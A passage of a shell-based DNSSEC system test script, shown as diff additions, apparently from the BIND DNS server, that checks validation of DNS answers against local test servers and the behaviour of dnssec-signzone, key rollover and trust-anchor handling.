+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+# The CNAME, NXT, and their SIGs
+grep "ANSWER: 4" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that validation of an ANY query returning a DNAME works ($n)"
+ret=0
+dig_with_opts +noauth foo.dname2.example. any @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth foo.dname2.example. 
any @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that lookups succeed after disabling an algorithm ($n)"
+ret=0
+dig_with_opts +noauth example. SOA @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+dig_with_opts +noauth example. SOA @10.53.0.6 \
+ > dig.out.ns6.test$n || ret=1
+digcomp dig.out.ns2.test$n dig.out.ns6.test$n || ret=1
+# Note - this is looking for failure, hence the &&
+grep "flags:.*ad.*QUERY" dig.out.ns6.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking a non-cachable NODATA works ($n)"
+ret=0
+dig_with_opts +noauth a.nosoa.secure.example. txt @10.53.0.7 \
+ > dig.out.ns7.test$n || ret=1
+grep "AUTHORITY: 0" dig.out.ns7.test$n > /dev/null || ret=1
+dig_with_opts +noauth a.nosoa.secure.example. txt @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking a non-cachable NXDOMAIN works ($n)"
+ret=0
+dig_with_opts +noauth b.nosoa.secure.example. txt @10.53.0.7 \
+ > dig.out.ns7.test$n || ret=1
+grep "AUTHORITY: 0" dig.out.ns7.test$n > /dev/null || ret=1
+dig_with_opts +noauth b.nosoa.secure.example. txt @10.53.0.4 \
+ > dig.out.ns4.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that we can load a rfc2535 signed zone ($n)"
+ret=0
+dig_with_opts rfc2535.example. 
SOA @10.53.0.2 \
+ > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that we can transfer a rfc2535 signed zone ($n)"
+ret=0
+dig_with_opts rfc2535.example. SOA @10.53.0.3 \
+ > dig.out.ns3.test$n || ret=1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "basic dnssec-signzone checks:"
+echo_ic "two DNSKEYs ($n)"
+ret=0
+(
+cd signer/general || exit 1
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test1.zone > signer.out.$n
+test -f signed.zone
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "one non-KSK DNSKEY ($n)"
+ret=0
+(
+cd signer/general || exit 0
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test2.zone > signer.out.$n
+test -f signed.zone
+) && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "one KSK DNSKEY ($n)"
+ret=0
+(
+cd signer/general || exit 0
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test3.zone > signer.out.$n
+test -f signed.zone
+) && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "three DNSKEY ($n)"
+ret=0
+(
+cd signer/general || exit 1
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test4.zone > signer.out.$n
+test -f signed.zone
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "three DNSKEY, one private key missing ($n)"
+ret=0
+(
+cd signer/general || exit 1
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test5.zone > signer.out.$n
+test -f signed.zone
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "four DNSKEY ($n)"
+ret=0
+(
+cd signer/general || exit 1
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. 
test6.zone > signer.out.$n
+test -f signed.zone
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "two DNSKEY, both private keys missing ($n)"
+ret=0
+(
+cd signer/general || exit 0
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test7.zone > signer.out.$n
+test -f signed.zone
+) && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "two DNSKEY, one private key missing ($n)"
+ret=0
+(
+cd signer/general || exit 0
+rm -f signed.zone
+$SIGNER -f signed.zone -o example.com. test8.zone > signer.out.$n
+test -f signed.zone
+) && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "check that dnssec-signzone rejects excessive NSEC3 iterations ($n)"
+ret=0
+(
+cd signer/general || exit 0
+rm -f signed.zone
+$SIGNER -f signed.zone -3 - -H 151 -o example.com. test9.zone > signer.out.$n
+test -f signed.zone
+) && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_ic "check that dnssec-signzone accepts maximum NSEC3 iterations ($n)"
+ret=0
+(
+cd signer/general || exit 1
+rm -f signed.zone
+$SIGNER -f signed.zone -3 - -H 150 -o example.com. test9.zone > signer.out.$n
+test -f signed.zone
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+get_default_algorithm_key_ids_from_sigs() {
+ zone=$1
+
+ tr -d '\r' < signer/$zone.db.signed | \
+ awk -v alg=$DEFAULT_ALGORITHM_NUMBER '
+ NF < 8 { next }
+ $(NF-5) != "RRSIG" { next }
+ $(NF-3) != alg { next }
+ $NF != "(" { next }
+ {
+ getline;
+ print $3;
+ }
+ ' | \
+ sort -u
+}
+
+# Test dnssec-signzone ZSK prepublish smooth rollover.
+echo_i "check dnssec-signzone doesn't sign with prepublished zsk ($n)"
+ret=0
+zone=prepub
+# Generate keys. 
+ksk=$("$KEYGEN" -K signer -f KSK -q -a $DEFAULT_ALGORITHM -n zone "$zone")
+zsk1=$("$KEYGEN" -K signer -q -a $DEFAULT_ALGORITHM -n zone "$zone")
+zsk2=$("$KEYGEN" -K signer -q -a $DEFAULT_ALGORITHM -n zone "$zone")
+zskid1=$(keyfile_to_key_id "$zsk1")
+zskid2=$(keyfile_to_key_id "$zsk2")
+(
+cd signer || exit 1
+# Set times such that the current set of keys are introduced 60 days ago and
+# start signing now. The successor key is prepublished now and will be active
+# next day.
+$SETTIME -P now-60d -A now $ksk > /dev/null
+$SETTIME -P now-60d -A now -I now+1d -D now+60d $zsk1 > /dev/null
+$SETTIME -S $zsk1 -i 1h $zsk2.key > /dev/null
+$SETTIME -P now -A now+1d $zsk2.key > /dev/null
+# Sign the zone with initial keys and prepublish successor. The zone signatures
+# are valid for 30 days and the DNSKEY signature is valid for 60 days.
+cp -f $zone.db.in $zone.db
+$SIGNER -SDx -e +2592000 -X +5184000 -o $zone $zone.db > /dev/null
+echo "\$INCLUDE \"$zone.db.signed\"" >> $zone.db
+)
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed: missing signatures from key $zskid1"
+status=$((status+ret))
+
+echo_i "check dnssec-signzone retains signatures of predecessor zsk ($n)"
+ret=0
+zone=prepub
+(
+cd signer || exit 1
+# Roll the ZSK. The predecessor is inactive from now on and the successor is
+# activated. The zone signatures are valid for 30 days and the DNSKEY
+# signature is valid for 60 days. Because of the predecessor/successor
+# relationship, the signatures of the predecessor are retained and no new
+# signatures with the successor should be generated. 
+$SETTIME -A now-30d -I now -D now+30d $zsk1 > /dev/null
+$SETTIME -A now $zsk2 > /dev/null
+$SIGNER -SDx -e +2592000 -X +5184000 -o $zone $zone.db > /dev/null
+)
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "check dnssec-signzone swaps zone signatures after interval ($n)"
+ret=0
+zone=prepub
+(
+cd signer || exit 1
+# After some time the signatures should be replaced. When signing, set the
+# interval to 30 days plus one second, meaning all predecessor signatures
+# are within the refresh interval and should be replaced with successor
+# signatures.
+$SETTIME -A now-50d -I now-20d -D now+10d $zsk1 > /dev/null
+$SETTIME -A now-20d $zsk2 > /dev/null
+$SIGNER -SDx -e +2592000 -X +5184000 -i 2592001 -o $zone $zone.db > /dev/null
+)
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid1$" > /dev/null && ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$zskid2$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a key using an unsupported algorithm cannot be generated ($n)"
+ret=0
+zone=example
+# If dnssec-keygen fails, the test script will exit immediately. Prevent that
+# from happening, and also trigger a test failure if dnssec-keygen unexpectedly
+# succeeds, by using "&& ret=1". 
+$KEYGEN -a 255 $zone > dnssectools.out.test$n 2>&1 && ret=1
+grep -q "unsupported algorithm: 255" dnssectools.out.test$n || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a DS record cannot be generated for a key using an unsupported algorithm ($n)"
+ret=0
+zone=example
+# Fake an unsupported algorithm key
+unsupportedkey=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone")
+awk '$3 == "DNSKEY" { $6 = 255 } { print }' ${unsupportedkey}.key > ${unsupportedkey}.tmp
+mv ${unsupportedkey}.tmp ${unsupportedkey}.key
+# If dnssec-dsfromkey fails, the test script will exit immediately. Prevent
+# that from happening, and also trigger a test failure if dnssec-dsfromkey
+# unexpectedly succeeds, by using "&& ret=1".
+$DSFROMKEY ${unsupportedkey} > dnssectools.out.test$n 2>&1 && ret=1
+grep -q "algorithm is unsupported" dnssectools.out.test$n || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a zone cannot be signed with a key using an unsupported algorithm ($n)"
+ret=0
+ret=0
+cat signer/example.db.in "${unsupportedkey}.key" > signer/example.db
+# If dnssec-signzone fails, the test script will exit immediately. Prevent that
+# from happening, and also trigger a test failure if dnssec-signzone
+# unexpectedly succeeds, by using "&& ret=1". 
+$SIGNER -o example signer/example.db ${unsupportedkey} > dnssectools.out.test$n 2>&1 && ret=1
+grep -q "algorithm is unsupported" dnssectools.out.test$n || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that we can sign a zone with out-of-zone records ($n)"
+ret=0
+zone=example
+key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone)
+(
+cd signer || exit 1
+cat example.db.in "$key1.key" "$key2.key" > example.db
+$SIGNER -o example -f example.db example.db > /dev/null
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that we can sign a zone (NSEC3) with out-of-zone records ($n)"
+ret=0
+zone=example
+key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone)
+(
+cd signer || exit 1
+cat example.db.in "$key1.key" "$key2.key" > example.db
+$SIGNER -3 - -H 10 -o example -f example.db example.db > /dev/null
+awk '/^IQF9LQTLK/ {
+ printf("%s", $0);
+ while (!index($0, ")")) {
+ if (getline <= 0)
+ break;
+ printf (" %s", $0);
+ }
+ printf("\n");
+ }' example.db | sed 's/[ ][ ]*/ /g' > nsec3param.out
+
+grep "IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG.example. 
0 IN NSEC3 1 0 10 - ( IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG A NS SOA RRSIG DNSKEY NSEC3PARAM )" nsec3param.out > /dev/null
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking NSEC3 signing with empty nonterminals above a delegation ($n)"
+ret=0
+zone=example
+key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone)
+(
+cd signer || exit 1
+cat example.db.in "$key1.key" "$key2.key" > example3.db
+echo "some.empty.nonterminal.nodes.example 60 IN NS ns.example.tld" >> example3.db
+$SIGNER -3 - -A -H 10 -o example -f example3.db example3.db > /dev/null
+awk '/^IQF9LQTLK/ {
+ printf("%s", $0);
+ while (!index($0, ")")) {
+ if (getline <= 0)
+ break;
+ printf (" %s", $0);
+ }
+ printf("\n");
+ }' example.db | sed 's/[ ][ ]*/ /g' > nsec3param.out
+
+grep "IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG.example. 0 IN NSEC3 1 0 10 - ( IQF9LQTLKKNFK0KVIFELRAK4IC4QLTMG A NS SOA RRSIG DNSKEY NSEC3PARAM )" nsec3param.out > /dev/null
+) || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that dnssec-signzone updates originalttl on ttl changes ($n)"
+ret=0
+zone=example
+key1=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+key2=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone $zone)
+(
+cd signer || exit 1
+cat example.db.in "$key1.key" "$key2.key" > example.db
+$SIGNER -o example -f example.db.before example.db > /dev/null
+sed 's/60.IN.SOA./50 IN SOA /' example.db.before > example.db.changed
+$SIGNER -o example -f example.db.after example.db.changed > /dev/null
+)
+grep "SOA $DEFAULT_ALGORITHM_NUMBER 1 50" signer/example.db.after > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone keeps valid signatures from removed keys ($n)"
+ret=0
+zone=example
+key1=$($KEYGEN -K signer -q -f KSK -a $DEFAULT_ALGORITHM -n zone 
$zone)
+key2=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+keyid2=$(keyfile_to_key_id "$key2")
+key3=$($KEYGEN -K signer -q -a $DEFAULT_ALGORITHM -n zone $zone)
+keyid3=$(keyfile_to_key_id "$key3")
+(
+cd signer || exit 1
+cat example.db.in "$key1.key" "$key2.key" > example.db
+$SIGNER -D -o example example.db > /dev/null
+
+# now switch out key2 for key3 and resign the zone
+cat example.db.in "$key1.key" "$key3.key" > example.db
+echo "\$INCLUDE \"example.db.signed\"" >> example.db
+$SIGNER -D -o example example.db > /dev/null
+) || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone -R purges signatures from removed keys ($n)"
+ret=0
+(
+cd signer || exit 1
+$SIGNER -RD -o example example.db > /dev/null
+) || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null && ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone keeps valid signatures from inactive keys ($n)"
+ret=0
+zone=example
+(
+cd signer || exit 1
+cp -f example.db.in example.db
+$SIGNER -SD -o example example.db > /dev/null
+echo "\$INCLUDE \"example.db.signed\"" >> example.db
+# now retire key2 and resign the zone
+$SETTIME -I now "$key2" > /dev/null 2>&1
+$SIGNER -SD -o example example.db > /dev/null
+) || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone -Q purges signatures from inactive keys ($n)"
+ret=0
+(
+cd signer || exit 1
+$SIGNER 
-SDQ -o example example.db > /dev/null
+) || ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid2$" > /dev/null && ret=1
+get_default_algorithm_key_ids_from_sigs $zone | grep "^$keyid3$" > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone retains unexpired signatures ($n)"
+ret=0
+(
+cd signer || exit 1
+$SIGNER -Sxt -o example example.db > signer.out.1
+$SIGNER -Sxt -o example -f example.db.signed example.db.signed > signer.out.2
+) || ret=1
+gen1=$(awk '/generated/ {print $3}' signer/signer.out.1)
+retain1=$(awk '/retained/ {print $3}' signer/signer.out.1)
+gen2=$(awk '/generated/ {print $3}' signer/signer.out.2)
+retain2=$(awk '/retained/ {print $3}' signer/signer.out.2)
+drop2=$(awk '/dropped/ {print $3}' signer/signer.out.2)
+[ "$retain2" -eq $((gen1+retain1)) ] || ret=1
+[ "$gen2" -eq 0 ] || ret=1
+[ "$drop2" -eq 0 ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone purges RRSIGs from formerly-owned glue (nsec) ($n)"
+ret=0
+(
+cd signer || exit 1
+# remove NSEC-only keys
+rm -f Kexample.+005*
+cp -f example.db.in example2.db
+cat << EOF >> example2.db
+sub1.example. IN A 10.53.0.1
+ns.sub2.example. IN A 10.53.0.2
+EOF
+echo "\$INCLUDE \"example2.db.signed\"" >> example2.db
+touch example2.db.signed
+$SIGNER -DS -O full -f example2.db.signed -o example example2.db > /dev/null
+) || ret=1
+grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1
+grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1
+(
+cd signer || exit 1
+cp -f example.db.in example2.db
+cat << EOF >> example2.db
+sub1.example. IN NS sub1.example.
+sub1.example. IN A 10.53.0.1
+sub2.example. IN NS ns.sub2.example.
+ns.sub2.example. 
IN A 10.53.0.2
+EOF
+echo "\$INCLUDE \"example2.db.signed\"" >> example2.db
+$SIGNER -DS -O full -f example2.db.signed -o example example2.db > /dev/null
+) || ret=1
+grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1
+grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone purges RRSIGs from formerly-owned glue (nsec3) ($n)"
+ret=0
+(
+cd signer || exit 1
+rm -f example2.db.signed
+cp -f example.db.in example2.db
+cat << EOF >> example2.db
+sub1.example. IN A 10.53.0.1
+ns.sub2.example. IN A 10.53.0.2
+EOF
+echo "\$INCLUDE \"example2.db.signed\"" >> example2.db
+touch example2.db.signed
+$SIGNER -DS -3 feedabee -O full -f example2.db.signed -o example example2.db > /dev/null
+) || ret=1
+grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1
+grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 || ret=1
+(
+cd signer || exit 1
+cp -f example.db.in example2.db
+cat << EOF >> example2.db
+sub1.example. IN NS sub1.example.
+sub1.example. IN A 10.53.0.1
+sub2.example. IN NS ns.sub2.example.
+ns.sub2.example. 
IN A 10.53.0.2
+EOF
+echo "\$INCLUDE \"example2.db.signed\"" >> example2.db
+$SIGNER -DS -3 feedabee -O full -f example2.db.signed -o example example2.db > /dev/null
+) || ret=1
+grep "^sub1\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1
+grep "^ns\\.sub2\\.example\\..*RRSIG[ ]A[ ]" signer/example2.db.signed > /dev/null 2>&1 && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone output format ($n)"
+ret=0
+(
+cd signer || exit 1
+$SIGNER -O full -f - -Sxt -o example example.db > signer.out.3 2> /dev/null
+$SIGNER -O text -f - -Sxt -o example example.db > signer.out.4 2> /dev/null
+$SIGNER -O raw -f signer.out.5 -Sxt -o example example.db > /dev/null
+$SIGNER -O raw=0 -f signer.out.6 -Sxt -o example example.db > /dev/null
+$SIGNER -O raw -f - -Sxt -o example example.db > signer.out.7 2> /dev/null
+) || ret=1
+awk 'BEGIN { found = 0; }
+ $1 == "example." && $3 == "IN" && $4 == "SOA" { found = 1; if (NF != 11) exit(1); }
+ END { if (!found) exit(1); }' signer/signer.out.3 || ret=1
+awk 'BEGIN { found = 0; }
+ $1 == "example." 
&& $3 == "IN" && $4 == "SOA" { found = 1; if (NF != 7) exit(1); }
+ END { if (!found) exit(1); }' signer/signer.out.4 || ret=1
+israw1 signer/signer.out.5 || ret=1
+israw0 signer/signer.out.6 || ret=1
+israw1 signer/signer.out.7 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking TTLs are capped by dnssec-signzone -M ($n)"
+ret=0
+(
+cd signer || exit 1
+$SIGNER -O full -f signer.out.8 -S -M 30 -o example example.db > /dev/null
+) || ret=1
+awk '/^;/ { next; } $2 > 30 { exit 1; }' signer/signer.out.8 || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking dnssec-signzone -N date ($n)"
+ret=0
+(
+cd signer || exit 1
+TZ=UTC $SIGNER -O full -f signer.out.9 -S -N date -o example example2.db > /dev/null
+) || ret=1
+# shellcheck disable=SC2016
+now=$(TZ=UTC $PERL -e '@lt=localtime(); printf "%.4d%0.2d%0.2d00\n",$lt[5]+1900,$lt[4]+1,$lt[3];')
+serial=$(awk '/^;/ { next; } $4 == "SOA" { print $7 }' signer/signer.out.9)
+[ "$now" -eq "$serial" ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking validated data are not cached longer than originalttl ($n)"
+ret=0
+dig_with_opts +ttl +noauth a.ttlpatch.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+dig_with_opts +ttl +noauth a.ttlpatch.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1
+grep "3600.IN" dig.out.ns3.test$n > /dev/null || ret=1
+grep "300.IN" dig.out.ns3.test$n > /dev/null && ret=1
+grep "300.IN" dig.out.ns4.test$n > /dev/null || ret=1
+grep "3600.IN" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Test that "rndc secroots" is able to dump trusted keys
+echo_i "checking rndc secroots ($n)"
+ret=0
+keyid=$(cat ns1/managed.key.id)
+rndccmd 10.53.0.4 secroots 2>&1 | sed 's/^/ns4 /' | cat_i
+cp ns4/named.secroots named.secroots.test$n
+check_secroots_layout named.secroots.test$n || ret=1
+linecount=$(grep -c "./$DEFAULT_ALGORITHM/$keyid ; static" named.secroots.test$n || true)
+[ "$linecount" -eq 1 ] || ret=1
+linecount=$(< named.secroots.test$n wc -l)
+[ "$linecount" -eq 9 ] || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check direct query for RRSIG. If we first ask for normal (non RRSIG)
+# record, the corresponding RRSIG should be cached and subsequent query
+# for RRSIG will be returned with the cached record.
+echo_i "checking RRSIG query from cache ($n)"
+ret=0
+dig_with_opts normalthenrrsig.secure.example. @10.53.0.4 a > /dev/null || ret=1
+ans=$(dig_with_opts +short normalthenrrsig.secure.example. @10.53.0.4 rrsig) || ret=1
+expect=$(dig_with_opts +short normalthenrrsig.secure.example. @10.53.0.3 rrsig | grep '^A' ) || ret=1
+test "$ans" = "$expect" || ret=1
+# also check that RA is set
+dig_with_opts normalthenrrsig.secure.example. @10.53.0.4 rrsig > dig.out.ns4.test$n || ret=1
+grep "flags:.*ra.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+# Check direct query for RRSIG: If it's not cached with other records,
+# it should result in an empty response.
+echo_i "checking RRSIG query not in cache ($n)"
+ret=0
+ans=$(dig_with_opts +short rrsigonly.secure.example.
@10.53.0.4 rrsig) || ret=1
+test -z "$ans" || ret=1
+# also check that RA is cleared
+dig_with_opts rrsigonly.secure.example. @10.53.0.4 rrsig > dig.out.ns4.test$n || ret=1
+grep "flags:.*ra.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# RT21868 regression test.
+#
+echo_i "checking NSEC3 zone with mismatched NSEC3PARAM / NSEC parameters ($n)"
+ret=0
+dig_with_opts non-exist.badparam. @10.53.0.2 a > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+#
+# RT22007 regression test.
+#
+echo_i "checking optout NSEC3 referral with only insecure delegations ($n)"
+ret=0
+dig_with_opts +norec delegation.single-nsec3. @10.53.0.2 a > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking optout NSEC3 NXDOMAIN with only insecure delegations ($n)"
+ret=0
+dig_with_opts +norec nonexist.single-nsec3. @10.53.0.2 a > dig.out.ns2.test$n || ret=1
+grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1
+grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+
+status=$((status+ret))
+echo_i "checking optout NSEC3 nodata with only insecure delegations ($n)"
+ret=0
+dig_with_opts +norec single-nsec3.
@10.53.0.2 a > dig.out.ns2.test$n || ret=1
+grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1
+grep "3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN.*NSEC3 1 1 1 - 3KL3NK1HKQ4IUEEHBEF12VGFKUETNBAN" dig.out.ns2.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking that a zone finishing the transition from $ALTERNATIVE_ALGORITHM to $DEFAULT_ALGORITHM validates secure ($n)"
+ret=0
+dig_with_opts ns algroll. @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking validate-except in an insecure local domain ($n)"
+ret=0
+dig_with_opts ns www.corp @10.53.0.4 > dig.out.ns4.test$n || ret=1
+grep "NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:[^;]* ad[^;]*;" dig.out.ns4.test$n > /dev/null && ret=1
+n=$((n+1))
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "checking positive and negative validation with negative trust anchors ($n)"
+ret=0
+
+#
+# check correct initial behavior
+#
+dig_with_opts a.bogus.example. a @10.53.0.4 > dig.out.ns4.test$n.1 || ret=1
